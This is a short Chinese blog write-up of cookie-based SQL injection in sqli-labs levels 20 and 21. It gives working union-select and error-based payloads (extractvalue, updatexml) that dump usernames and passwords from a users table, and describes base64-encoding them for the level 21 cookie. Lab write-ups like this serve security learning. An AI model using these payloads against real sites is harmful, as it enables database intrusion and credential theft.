关于cookie注入


0x00 关于cookie注入介绍

cookie注入也称作加解密注入,账户信息等可能通过加密传输,可通过抓包获取cookie信息,以及对源码分析信息结果加密后传入传出数据库,通过寻找其相关的加密方式,使注入语句加密进行注入

0x01 sqil-20-21cookie示例

通过bur抓取数据包发现cookie信息,less-20使用cookie传输但未作加密,直接在数据包通过cookie位置进行注入,注入方式参考前面的联合注入,即可注入成功

-admin' union select 1,(select group_concat(username,password) from users),user()--+

采用联合注入
less-21通过抓包发现cookie加密,通过观察cookie加密数据发现%3D,在加密中此数据使被base64加密的=,通过base64解码获取账户信息,随后采用报错注入,可以用到两个函数extractvalue以及updataexml,所有的注入语句都采用相同的加密后在数据包里面注入观察结果即可
21关闭合方式为‘)
less-21使用报错注入
通过反复注入我发现less-21还可以使用到下列三种报错语句
仅供参考

admin') and extractvalue(1,concat(0x7e,(select group_concat(username,password) from users limit 0,1),0x7e))#
admin' or extractvalue(1,concat(0x7e,(select group_concat(username,password) from users limit 0,1),0x7e)) or'
admin' or updatexml(1,concat(0x7e,(select group_concat(username,password) from users limit 0,1),0x7e),1) or'

文章作者: 告白
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 告白 !
  目录